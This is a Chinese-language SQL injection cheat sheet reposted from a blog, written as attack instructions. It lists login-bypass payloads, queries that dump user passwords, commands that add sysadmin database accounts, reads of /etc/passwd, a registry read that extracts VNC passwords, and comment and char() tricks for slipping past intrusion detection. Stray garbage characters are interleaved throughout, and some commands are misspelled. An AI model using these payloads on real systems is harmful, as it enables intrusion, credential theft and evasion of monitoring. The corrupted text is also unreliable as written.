SQL注射技术汉化版

admin

SQL注射技术汉化版
转自；http://nb.2sb.cn/?p=54
作者：深灰色
====||目录||=====
4 i& ]4 I; B$ ~) p
——————–
2 A* o& P' @( x4 T( B% \6 a. I; l
1、简介

0 w5 W1 {0 l" a$ }  F" E2、漏洞测试
4 |/ l( [" Q# {) K3 v8 X
! Y# z8 x# i& j0 I: Q, x1 Y+ M3、收集信息

4、数据类型

0 w% ^, Z. z" L. f' k" T! A5、抓取密码

6、创建数据库帐号
" d1 w9 [1 Y  e- `0 P, a" _0 z( S
7、MYSQL利用

8、服务名和配置

9、在注册表中找VNC密码

10、刺穿IDS认证
1 t: r. q3 }+ A1 B4 @+ E& d# r0 z
11、在MYSQL中使用char()欺骗

$ U5 P2 k  |) Z12、用注释躲避IDS认证
' S9 P$ J: j" u4 }3 U
13、构造无引号的字符串


! G  C1 w" X6 n. Q8 W. t
====||文章开始||====
3 I$ o* G# b1 F! x! a+ Z
1、简介

% C1 B5 z! Y4 Q9 c2 W当你看到一个服务器只开了80端口，这在一定程度上说明管理员把系统的补丁做的很好，我们所要做最有效的攻击则也应该转向WEB攻击。SQL注射是最常用的攻击方式。你攻击WEN系统（ASP，PHP，JSP，CGI等）比去攻击系统或者其他的系统服务要简单的多。
# @6 c9 d/ k1 N" t! ^2 B3 l) K
' ~3 z! n% z* z) `/ C9 c' QSQL注射是通过页面中的输入来欺骗使得其可以运行我们构造的查询或者别的命令，我们知道在WEB上面有很多供我们输入参数的地方，比如用户名、密码或者E_mail。
) u. ]0 ]9 y: Z3 @

. S3 i, c+ u6 \& c: r: G
  D- n& g) W3 ]4 _4 N9 g/ y2、漏洞测试

. q6 o6 g7 O% m8 e1 v2 J6 m" }最开始我们应该从最简单的来试：

- Login:’ or 1=1–

, P3 v1 i. A- \8 k- Pass:’ or 1=1–
, F0 Z; y. h" x
6 D9 t) r: o& y7 t# l) `- http://website/index.asp?id=’ or 1=1–

( Q) W9 H: H6 `2 U. \5 S9 l还有下面这样的方式：
7 E& n* ]8 L. f& s, [" _
0 e0 l! d7 T5 }4 t: _: u: i- ‘ having 1=1–

) Z! Q. e, d' ~- ‘ group by userid having 1=1–

- ‘ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘tablename’)–
1 g+ W' a6 P$ H2 m: ^
: N2 v5 t+ b. h* W  |+ A- ‘ union select sum(columnname) from tablename–



3、收集信息
' U+ E7 z1 P" M1 s/ o
1 C% B) {' ^6 v- ‘ or 1 in (select @@version)–

0 Y- L, E% H- g- ‘ union all select @@version–

上面就可以得到系统的版本和补丁信息。
) n" O/ X5 [; Y- z% u
- ~$ \% }7 E4 U6 t* _( N  r
6 t9 @5 R. w& q
! g9 G9 L! w  Z5 S7 ~, J4、数据类型

Oracle数据库>>
/ {4 f) x( `3 m  z. u; p& ^
–>SYS.USER_OBJECTS (USEROBJECTS)
& w8 Y8 c0 s1 {: [
8 ^9 T5 ^, j1 i; m2 K–>SYS.USER_VIEWS
9 D6 E$ q; u# y" R
$ _; o* Q( L7 i" X. g  l! H% }–>SYS.USER_TABLES
' U1 x) j  p$ l. c0 I
–>SYS.USER_VIEWS
2 i2 o2 t! ~% q. X: N4 _
–>SYS.USER_TAB_COLUMNS

3 U# L& A; i2 q- ~9 L–>SYS.USER_CATALOG

–>SYS.USER_TRIGGERS
7 t6 g, i- }3 u
–>SYS.ALL_TABLES
0 R% \* |6 q6 o: s
% m' @% u5 p$ `8 k! S$ C–>SYS.TAB
4 l0 T+ ], T, ~; S1 u3 t; @/ i7 |
. x$ {" x3 J# JMySQL数据库

–>mysql.user
% I- u  I  j+ C3 q7 F# r3 G
–>mysql.host

–>mysql.db
* F' V2 R' C7 O

* [( t- F9 C) W
MS access数据
6 ~& y" Z. U" d5 c
–>MsysACEs

" V$ j6 w/ B! I! C3 Y( c: d: ~1 T–>MsysObjects
* q+ G. W2 M9 @0 y$ ?/ |
' b0 U6 N5 I8 }* Z0 A# u8 k–>MsysQueries
  A8 T$ s7 o& P. t! B1 u8 @) t' z
–>MsysRelationships



MS SQL Server数据库

) f- o: ], I$ v# x–>sysobjects

–>syscolumns
1 M6 k2 a  p3 C1 ^8 q
–>systypes
. g8 x! ]' B: ^) x. g  ^2 _% f
–>sysdatabases
3 [7 s4 Y" r  s& ~/ e4 f" B
8 p6 s( _6 M# Z, o
( T8 |' G0 i) [' T5 ~
5、抓取密码
$ B9 I. `0 ~7 S- w3 a
8 a/ p0 r9 u5 r; C2 N9 j' o+ @用类似下面的语句。。。
2 x% y( \7 \. y7 g& T: B4 w
6 N3 ^) Z% ~- j0 A. K1 y/ Y  |//保存查询的结果
( f$ t, K$ t: m% K9 j
step1 : ‘; begin declare @var varchar(8000) set @var=’:’ select @var=@var+’+login+’/'+password+’ ‘ from users where login > @var select @var as var into temp end –

//取得信息

step2 : ‘ and 1 in (select var from temp)–

//删除临时表
2 M8 n/ g1 j) P
step3 : ‘ ; drop table temp –



6、创建数据库帐号

, c- v! f1 b( C, L, `$ G! L0 d5 T6 qMS SQL
9 c% e( W/ h# [, e2 t2 T! E
exec sp_addlogin ‘name’ , ‘password’
. p: q4 F% K6 F9 X. r9 {. o
' J( t6 t1 }4 i5 \, R2 Gexec sp_addsrvrolemember ‘name’ , ’sysadmin’
+ B& T! X6 s: I" u* e* j
0 d! z# g$ u$ a/ G5 B# N
# C# S* o. p9 E, r9 |# O
1 R: k. @) C$ V% NMySQL
! |3 i5 {  r! }
& G- P! I/ o7 {INSERT INTO mysql.user (user, host, password) VALUES (’name’, ‘localhost’, PASSWORD(’pass123′))

2 ?; r( z4 I& q, }; C. N' L

Access

CRATE USER name IDENTIFIED BY ‘pass123′

& A9 K- o# f6 W4 Q8 V3 T

Postgres (requires Unix account)
* b5 |: t8 l8 o4 M, l4 k
2 K& P% V& t+ [! u! z3 D* H& n% ^$ QCRATE USER name WITH PASSWORD ‘pass123′
% \2 T& w0 q3 X( [; x

) J5 D/ G* [3 w) R
2 f/ A7 r: k% Z, ~+ a9 n4 ^# gOracle
' Z9 L& y7 k# R
0 \' c, L( z) zCRATE USER name IDENTIFIED BY pass123
% a5 Q# F  r! q/ i6 \7 n
# c8 ^- }  C! G2 A" w        TEMPORARY TABLESPACE temp
2 r* I# {& h. v) [
         DEFAULT TABLESPACE users;
3 n9 H- E! P5 C1 K6 y
, @. p9 O# J! n  [  q4 d( Q) l  cGRANT CONNECT TO name;

GRANT RESOURCE TO name;

! d4 o1 d' j0 {' l: ^* B& i, s  M

7、MYSQL交互查询

使用Union查询，暴出文件代码，如下：
/ Z/ @9 o6 `) B* k7 h: b
- ‘ union select 1,load_file(’/etc/passwd’),1,1,1;
+ s4 r" f6 C& D0 z3 v$ Q+ ~2 Z
! c7 n* m' _: X& D6 Q
( n+ @4 R1 I8 q0 B9 R! M3 B
# Q. N/ G. d1 B7 D8 N1 {# r8、系统服务名和配置

1 K/ w2 q* ~8 u4 I- ‘ and 1 in (select @@servername)–

  F5 y4 O# G% p2 |5 x- ‘ and 1 in (select servername from master.sysservers)–
7 ~4 }  b* V- @2 S# U( A


' F$ Y8 D- R$ l' k+ E9、找到VNC密码（注册表）

实验语句如下：
2 ~6 F/ D/ ?( f+ w* j/ }4 _
- ‘; declare @out binary(8)

9 W" n2 ~$ A- X- exec master..xp_regread

- @rootkey = ‘HKEY_LOCAL_MACHINE’,
, x$ z; E! Y5 f, g
8 r# b0 ]" h3 Y7 }- @key = ‘SOFTWARE\ORL\WinVNC3\Default’,
3 g7 y" |$ |# v  _" d
- @value_name=’password’,
, O' t1 f2 g4 j1 y) h2 k) p3 N
& v0 W, \( _; q9 K; ]- @value = @out output

- select cast (@out as bigint) as x into TEMP–
- \2 B2 X  E* t& M4 c
- ‘ and 1 in (select cast(x as varchar) from temp)–



10、避开IDS检测

# R& Q- v+ p3 f! C/ eEvading ‘ OR 1=1 Signature

- g5 t% A: g( C) x) t( i6 D
$ o+ b2 I7 o! [: M& x
5 U! |& x  O7 {  i. d* M- ‘ OR ‘unusual’ = ‘unusual’

- ‘ OR ’something’ = ’some’+'thing’

" M! i  Z+ V. \, N% u6 a  J- ‘ OR ‘text’ = N’text’
1 {  _5 c3 N4 g% i) @- m" U9 w
4 o; O5 C3 E1 \5 t- L0 v* R- ‘ OR ’something’ like ’some%’
) U0 y& B! H. }/ d: J1 E
- ‘ OR 2 > 1

5 E& S0 h2 r" Z2 _& h& r- ‘ OR ‘text’ > ‘t’
' F. u& H4 O# b0 A- H2 N
- ‘ OR ‘whatever’ in (’whatever’)
( [8 \! W$ l3 J& n* |% ]
* }: t) G# ~5 L; o% i4 o: @6 W- ‘ OR 2 BETWEEN 1 and 3
# d, K# y0 g# ~+ Q+ @; Y8 f0 q


11、MYSQL中使用char()函数
2 H! s; k9 a( l, q8 E4 `$ X
不带引号的注射，例如： (string = “%”):
9 H5 t2 B! P$ Y& i: o% ]
' P8 m( E" N! ~* K6 @- p8 \* y–> ‘ or username like char(37);
* h) w& q# ?* C4 O$ H  P
6 m( B- v+ Y, _6 `带引号的注射，例如： (string=”root”):

–> ‘ union select * from users where login = char(114,111,111,116);
( v7 u  n3 ]+ H, P1 P3 E3 Q( o; a
在 unions中使用load files 函数，例如：(string = “/etc/passwd”):
" z# q; O" Y& r
- x0 E) A  x/ ~2 \2 F4 q+ W–>’ union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;

检查文件是否存在，例如： (string = “n.ext”):
. b0 i' P/ N: c& z3 _+ j9 P
5 `& i! z9 Q0 \  }( F1 a$ }–>’ and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));


- p8 b* \; U) L
' M. }/ l) j; F4 h* \/ Q3 z12、利用注释符号避开IDS
8 Z. o1 l5 N) E0 E' T" \
举例如下：
0 Y7 r, f, i' t: d$ g
5 A! K0 \* E4 V8 {( Q% f9 X( K–>’/**/OR/**/1/**/=/**/1
9 Y1 S8 l; y8 i, n' Y
' n/ y# B. M" i" B+ R. P–>Username:’ or 1/*

–>Password:*/=1–

4 D+ ?3 G* K* b3 c–>UNI/**/ON SEL/**/ECT （！！！这个比较罕见，应该大有作为！！！）

8 ?! z3 M! H7 }$ y& }–>(Oracle)     ‘; EXECUTE IMMEDIATE ‘SEL’ || ‘ECT US’ || ‘ER’

5 b% X1 ~/ d% K" {–>(MS SQL)    ‘; EXEC (’SEL’ + ‘ECT US’ + ‘ER’)

% n0 ~4 X# T$ r
$ P- _  Z! l0 _
13、不带引号的字符串

' Y5 g. I/ \. P1 R& E2 _3 N. q6 f9 b用char()或者0X来构造不含引号的语句。。
* o% H  V# p& q
6 h% i8 v* h% B4 k* C–> INSERT INTO Users(Login, Password, Level) VALUES( char(0×70) + char(0×65) + char(0×74) + char(0×65) + char(0×72) + char(0×70) + char(0×65) + char(0×74) + char(0×65) + char(0×72), 0×64)